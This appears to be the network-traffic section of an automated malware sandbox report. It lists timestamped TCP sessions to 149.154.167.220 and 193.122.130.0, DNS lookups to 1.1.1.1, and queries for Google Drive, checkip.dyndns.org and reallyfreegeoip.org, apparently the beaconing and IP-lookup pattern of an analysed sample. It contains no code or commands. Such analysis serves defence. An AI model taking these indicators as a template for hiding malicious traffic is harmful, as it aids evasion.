Dec 17, 2024 03:29:55.851885080 CET	443	49742	149.154.167.220	192.168.2.4
Dec 17, 2024 03:29:55.851969957 CET	49742	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:29:55.852957964 CET	49742	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:29:55.852989912 CET	443	49742	149.154.167.220	192.168.2.4
Dec 17, 2024 03:29:57.230140924 CET	443	49742	149.154.167.220	192.168.2.4
Dec 17, 2024 03:29:57.230242014 CET	49742	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:29:57.232974052 CET	49742	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:29:57.232986927 CET	443	49742	149.154.167.220	192.168.2.4
Dec 17, 2024 03:29:57.233393908 CET	443	49742	149.154.167.220	192.168.2.4
Dec 17, 2024 03:29:57.235496044 CET	49742	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:29:57.279352903 CET	443	49742	149.154.167.220	192.168.2.4
Dec 17, 2024 03:29:57.279439926 CET	49742	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:29:57.279453993 CET	443	49742	149.154.167.220	192.168.2.4
Dec 17, 2024 03:29:57.845920086 CET	443	49742	149.154.167.220	192.168.2.4
Dec 17, 2024 03:29:57.846120119 CET	443	49742	149.154.167.220	192.168.2.4
Dec 17, 2024 03:29:57.846206903 CET	49742	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:29:57.846611023 CET	49742	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:29:58.029243946 CET	49738	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:29:58.030225039 CET	49748	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:29:58.149379015 CET	80	49738	193.122.130.0	192.168.2.4
Dec 17, 2024 03:29:58.149580956 CET	49738	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:29:58.149970055 CET	80	49748	193.122.130.0	192.168.2.4
Dec 17, 2024 03:29:58.150095940 CET	49748	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:29:58.150279999 CET	49748	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:29:58.270035982 CET	80	49748	193.122.130.0	192.168.2.4
Dec 17, 2024 03:29:59.247704983 CET	80	49748	193.122.130.0	192.168.2.4
Dec 17, 2024 03:29:59.249067068 CET	49749	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:29:59.249119043 CET	443	49749	149.154.167.220	192.168.2.4
Dec 17, 2024 03:29:59.249206066 CET	49749	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:29:59.249795914 CET	49749	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:29:59.249816895 CET	443	49749	149.154.167.220	192.168.2.4
Dec 17, 2024 03:29:59.302937984 CET	49748	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:00.619409084 CET	443	49749	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:00.620876074 CET	49749	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:00.620910883 CET	443	49749	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:00.620976925 CET	49749	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:00.621000051 CET	443	49749	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:01.216675043 CET	443	49749	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:01.216893911 CET	443	49749	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:01.216973066 CET	49749	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:01.217253923 CET	49749	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:01.221014977 CET	49748	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:01.221959114 CET	49755	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:01.341487885 CET	80	49748	193.122.130.0	192.168.2.4
Dec 17, 2024 03:30:01.341578960 CET	49748	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:01.341742039 CET	80	49755	193.122.130.0	192.168.2.4
Dec 17, 2024 03:30:01.341849089 CET	49755	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:01.341950893 CET	49755	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:01.461704969 CET	80	49755	193.122.130.0	192.168.2.4
Dec 17, 2024 03:30:12.433202982 CET	80	49755	193.122.130.0	192.168.2.4
Dec 17, 2024 03:30:12.436273098 CET	49785	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:12.436366081 CET	443	49785	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:12.436465025 CET	49785	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:12.436709881 CET	49785	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:12.436739922 CET	443	49785	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:12.490732908 CET	49755	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:13.810359955 CET	443	49785	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:13.812324047 CET	49785	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:13.812371016 CET	443	49785	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:13.812586069 CET	49785	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:13.812609911 CET	443	49785	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:14.445112944 CET	443	49785	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:14.445296049 CET	443	49785	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:14.445401907 CET	49785	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:14.445880890 CET	49785	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:14.451617002 CET	49787	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:14.571389914 CET	80	49787	193.122.130.0	192.168.2.4
Dec 17, 2024 03:30:14.571472883 CET	49787	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:14.571630955 CET	49787	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:14.691369057 CET	80	49787	193.122.130.0	192.168.2.4
Dec 17, 2024 03:30:19.952058077 CET	80	49787	193.122.130.0	192.168.2.4
Dec 17, 2024 03:30:20.006290913 CET	49787	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:20.188060999 CET	49803	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:20.188150883 CET	443	49803	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:20.190052986 CET	49803	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:20.190406084 CET	49803	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:20.190440893 CET	443	49803	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:21.604162931 CET	443	49803	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:21.608295918 CET	49803	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:21.608365059 CET	443	49803	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:21.608475924 CET	49803	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:21.608503103 CET	443	49803	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:22.223799944 CET	443	49803	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:22.223974943 CET	443	49803	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:22.224459887 CET	49803	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:22.224793911 CET	49803	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:22.227643967 CET	49787	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:22.228961945 CET	49809	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:22.347758055 CET	80	49787	193.122.130.0	192.168.2.4
Dec 17, 2024 03:30:22.348145962 CET	49787	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:22.348710060 CET	80	49809	193.122.130.0	192.168.2.4
Dec 17, 2024 03:30:22.349040985 CET	49809	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:22.349205017 CET	49809	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:22.468846083 CET	80	49809	193.122.130.0	192.168.2.4
Dec 17, 2024 03:30:23.850805998 CET	80	49809	193.122.130.0	192.168.2.4
Dec 17, 2024 03:30:23.851938963 CET	49815	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:23.852029085 CET	443	49815	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:23.852121115 CET	49815	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:23.852426052 CET	49815	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:23.852509022 CET	443	49815	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:23.896888971 CET	49809	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:25.245055914 CET	443	49815	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:25.246407986 CET	49815	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:25.246470928 CET	443	49815	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:25.246788979 CET	49815	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:25.246846914 CET	443	49815	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:25.891895056 CET	443	49815	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:25.892004967 CET	443	49815	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:25.892071962 CET	49815	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:25.892412901 CET	49815	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:25.895106077 CET	49809	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:25.896289110 CET	49820	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:26.101530075 CET	80	49820	193.122.130.0	192.168.2.4
Dec 17, 2024 03:30:26.101608038 CET	49820	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:26.101749897 CET	49820	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:26.103545904 CET	80	49809	193.122.130.0	192.168.2.4
Dec 17, 2024 03:30:26.103607893 CET	49809	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:26.221787930 CET	80	49820	193.122.130.0	192.168.2.4
Dec 17, 2024 03:30:28.780415058 CET	80	49820	193.122.130.0	192.168.2.4
Dec 17, 2024 03:30:28.781661987 CET	49827	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:28.781747103 CET	443	49827	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:28.781826019 CET	49827	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:28.782128096 CET	49827	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:28.782166004 CET	443	49827	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:28.834295988 CET	49820	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:30.148979902 CET	443	49827	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:30.150507927 CET	49827	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:30.150568962 CET	443	49827	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:30.150648117 CET	49827	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:30.150662899 CET	443	49827	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:30.827014923 CET	443	49827	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:30.827236891 CET	443	49827	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:30.827330112 CET	49827	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:30.827632904 CET	49827	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:30.831228018 CET	49820	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:30.832369089 CET	49833	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:30.951744080 CET	80	49820	193.122.130.0	192.168.2.4
Dec 17, 2024 03:30:30.951951981 CET	49820	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:30.952142954 CET	80	49833	193.122.130.0	192.168.2.4
Dec 17, 2024 03:30:30.952270985 CET	49833	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:30.952403069 CET	49833	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:31.072063923 CET	80	49833	193.122.130.0	192.168.2.4
Dec 17, 2024 03:30:33.184701920 CET	80	49833	193.122.130.0	192.168.2.4
Dec 17, 2024 03:30:33.185761929 CET	49839	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:33.185808897 CET	443	49839	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:33.185878992 CET	49839	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:33.186127901 CET	49839	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:33.186146021 CET	443	49839	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:33.224925041 CET	49833	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:34.569333076 CET	443	49839	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:34.571264029 CET	49839	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:34.571325064 CET	443	49839	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:34.571400881 CET	49839	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:34.571423054 CET	443	49839	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:35.275688887 CET	443	49839	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:35.277359009 CET	443	49839	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:35.277543068 CET	49839	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:35.277939081 CET	49839	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:35.281599045 CET	49833	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:35.282715082 CET	49845	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:35.401719093 CET	80	49833	193.122.130.0	192.168.2.4
Dec 17, 2024 03:30:35.401912928 CET	49833	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:35.402712107 CET	80	49845	193.122.130.0	192.168.2.4
Dec 17, 2024 03:30:35.402832031 CET	49845	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:35.403019905 CET	49845	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:35.523010969 CET	80	49845	193.122.130.0	192.168.2.4
Dec 17, 2024 03:30:36.499257088 CET	80	49845	193.122.130.0	192.168.2.4
Dec 17, 2024 03:30:36.500771046 CET	49850	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:36.500854969 CET	443	49850	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:36.501147032 CET	49850	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:36.501393080 CET	49850	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:36.501418114 CET	443	49850	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:36.553287983 CET	49845	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:37.870995998 CET	443	49850	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:37.872787952 CET	49850	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:37.872847080 CET	443	49850	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:37.872982979 CET	49850	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:37.873006105 CET	443	49850	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:38.521420002 CET	443	49850	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:38.521775961 CET	443	49850	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:38.521967888 CET	49850	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:38.522269011 CET	49850	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:38.524940968 CET	49845	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:38.526005983 CET	49856	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:38.645318985 CET	80	49845	193.122.130.0	192.168.2.4
Dec 17, 2024 03:30:38.645417929 CET	49845	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:38.645751953 CET	80	49856	193.122.130.0	192.168.2.4
Dec 17, 2024 03:30:38.645819902 CET	49856	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:38.645919085 CET	49856	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:38.767467022 CET	80	49856	193.122.130.0	192.168.2.4
Dec 17, 2024 03:30:41.932009935 CET	80	49856	193.122.130.0	192.168.2.4
Dec 17, 2024 03:30:41.933645964 CET	49863	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:41.933690071 CET	443	49863	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:41.933778048 CET	49863	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:41.934150934 CET	49863	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:41.934170008 CET	443	49863	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:41.974968910 CET	49856	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:43.375444889 CET	443	49863	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:43.377413034 CET	49863	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:43.377471924 CET	443	49863	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:43.377537966 CET	49863	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:43.377561092 CET	443	49863	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:44.061017990 CET	443	49863	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:44.061197996 CET	443	49863	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:44.061289072 CET	49863	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:44.061709881 CET	49863	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:44.065311909 CET	49856	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:44.066658020 CET	49869	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:44.185452938 CET	80	49856	193.122.130.0	192.168.2.4
Dec 17, 2024 03:30:44.185589075 CET	49856	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:44.186438084 CET	80	49869	193.122.130.0	192.168.2.4
Dec 17, 2024 03:30:44.186583996 CET	49869	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:44.186748981 CET	49869	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:44.306468010 CET	80	49869	193.122.130.0	192.168.2.4
Dec 17, 2024 03:30:46.649015903 CET	80	49869	193.122.130.0	192.168.2.4
Dec 17, 2024 03:30:46.650144100 CET	49875	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:46.650171995 CET	443	49875	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:46.650250912 CET	49875	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:46.650607109 CET	49875	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:46.650623083 CET	443	49875	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:46.693814993 CET	49869	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:48.020370007 CET	443	49875	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:48.022317886 CET	49875	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:48.022335052 CET	443	49875	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:48.022384882 CET	49875	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:48.022393942 CET	443	49875	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:48.646699905 CET	443	49875	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:48.646876097 CET	443	49875	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:48.646946907 CET	49875	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:48.647392035 CET	49875	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:48.650727034 CET	49869	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:48.651901007 CET	49880	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:48.770921946 CET	80	49869	193.122.130.0	192.168.2.4
Dec 17, 2024 03:30:48.771187067 CET	49869	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:48.771595001 CET	80	49880	193.122.130.0	192.168.2.4
Dec 17, 2024 03:30:48.775103092 CET	49880	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:48.775249004 CET	49880	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:48.894926071 CET	80	49880	193.122.130.0	192.168.2.4
Dec 17, 2024 03:30:49.871965885 CET	80	49880	193.122.130.0	192.168.2.4
Dec 17, 2024 03:30:49.873337030 CET	49885	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:49.873424053 CET	443	49885	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:49.873517036 CET	49885	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:49.873783112 CET	49885	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:49.873821974 CET	443	49885	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:49.928080082 CET	49880	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:51.241199017 CET	443	49885	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:51.242938995 CET	49885	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:51.242965937 CET	443	49885	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:51.243138075 CET	49885	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:51.243165016 CET	443	49885	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:51.952070951 CET	443	49885	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:51.952344894 CET	443	49885	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:51.952554941 CET	49885	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:51.952717066 CET	49885	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:51.956033945 CET	49880	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:51.957075119 CET	49891	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:52.076385021 CET	80	49880	193.122.130.0	192.168.2.4
Dec 17, 2024 03:30:52.076623917 CET	49880	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:52.076968908 CET	80	49891	193.122.130.0	192.168.2.4
Dec 17, 2024 03:30:52.077229977 CET	49891	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:52.077415943 CET	49891	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:52.214238882 CET	80	49891	193.122.130.0	192.168.2.4
Dec 17, 2024 03:30:54.273268938 CET	80	49891	193.122.130.0	192.168.2.4
Dec 17, 2024 03:30:54.274993896 CET	49898	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:54.275087118 CET	443	49898	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:54.275177956 CET	49898	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:54.275461912 CET	49898	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:54.275495052 CET	443	49898	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:54.318732023 CET	49891	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:55.655864954 CET	443	49898	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:55.657880068 CET	49898	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:55.657958031 CET	443	49898	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:55.658039093 CET	49898	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:55.658063889 CET	443	49898	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:56.279805899 CET	443	49898	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:56.279999971 CET	443	49898	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:56.280220032 CET	49898	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:56.280543089 CET	49898	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:56.285176039 CET	49891	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:56.286240101 CET	49901	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:56.405927896 CET	80	49891	193.122.130.0	192.168.2.4
Dec 17, 2024 03:30:56.406054020 CET	80	49901	193.122.130.0	192.168.2.4
Dec 17, 2024 03:30:56.406169891 CET	49891	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:56.406385899 CET	49901	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:56.406482935 CET	49901	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:56.526457071 CET	80	49901	193.122.130.0	192.168.2.4
Dec 17, 2024 03:30:58.549431086 CET	80	49901	193.122.130.0	192.168.2.4
Dec 17, 2024 03:30:58.559432030 CET	49907	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:58.559524059 CET	443	49907	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:58.560862064 CET	49907	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:58.564913034 CET	49907	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:58.564948082 CET	443	49907	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:58.600013018 CET	49901	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:30:59.930592060 CET	443	49907	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:59.935419083 CET	49907	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:59.935460091 CET	443	49907	149.154.167.220	192.168.2.4
Dec 17, 2024 03:30:59.935590982 CET	49907	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:30:59.935602903 CET	443	49907	149.154.167.220	192.168.2.4
Dec 17, 2024 03:31:00.594707012 CET	443	49907	149.154.167.220	192.168.2.4
Dec 17, 2024 03:31:00.594856024 CET	443	49907	149.154.167.220	192.168.2.4
Dec 17, 2024 03:31:00.594928026 CET	49907	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:31:00.595346928 CET	49907	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:31:00.598485947 CET	49901	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:31:00.599164963 CET	49913	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:31:00.719603062 CET	80	49901	193.122.130.0	192.168.2.4
Dec 17, 2024 03:31:00.719912052 CET	80	49913	193.122.130.0	192.168.2.4
Dec 17, 2024 03:31:00.720038891 CET	49901	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:31:00.720200062 CET	49913	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:31:00.720274925 CET	49913	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:31:00.841027975 CET	80	49913	193.122.130.0	192.168.2.4
Dec 17, 2024 03:31:03.529387951 CET	80	49913	193.122.130.0	192.168.2.4
Dec 17, 2024 03:31:03.584389925 CET	49913	80	192.168.2.4	193.122.130.0
Dec 17, 2024 03:31:04.059324026 CET	49920	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:31:04.059351921 CET	443	49920	149.154.167.220	192.168.2.4
Dec 17, 2024 03:31:04.059421062 CET	49920	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:31:04.059756994 CET	49920	443	192.168.2.4	149.154.167.220
Dec 17, 2024 03:31:04.059772968 CET	443	49920	149.154.167.220	192.168.2.4
Dec 17, 2024 03:31:05.426922083 CET	443	49920	149.154.167.220	192.168.2.4
Dec 17, 2024 03:31:05.475009918 CET	49920	443	192.168.2.4	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 17, 2024 03:29:37.735479116 CET	59172	53	192.168.2.4	1.1.1.1
Dec 17, 2024 03:29:37.961224079 CET	53	59172	1.1.1.1	192.168.2.4
Dec 17, 2024 03:29:40.030520916 CET	58983	53	192.168.2.4	1.1.1.1
Dec 17, 2024 03:29:40.256015062 CET	53	58983	1.1.1.1	192.168.2.4
Dec 17, 2024 03:29:44.842318058 CET	51923	53	192.168.2.4	1.1.1.1
Dec 17, 2024 03:29:45.067511082 CET	53	51923	1.1.1.1	192.168.2.4
Dec 17, 2024 03:29:47.885600090 CET	51129	53	192.168.2.4	1.1.1.1
Dec 17, 2024 03:29:48.111742020 CET	53	51129	1.1.1.1	192.168.2.4
Dec 17, 2024 03:29:55.625483990 CET	63125	53	192.168.2.4	1.1.1.1
Dec 17, 2024 03:29:55.850902081 CET	53	63125	1.1.1.1	192.168.2.4
Dec 17, 2024 03:30:19.956463099 CET	65270	53	192.168.2.4	1.1.1.1
Dec 17, 2024 03:30:20.181792021 CET	53	65270	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 17, 2024 03:29:37.735479116 CET	192.168.2.4	1.1.1.1	0xb9ae	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 03:29:40.030520916 CET	192.168.2.4	1.1.1.1	0x7917	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 03:29:44.842318058 CET	192.168.2.4	1.1.1.1	0x844c	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Dec 17, 2024 03:29:47.885600090 CET	192.168.2.4	1.1.1.1	0x1f10	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
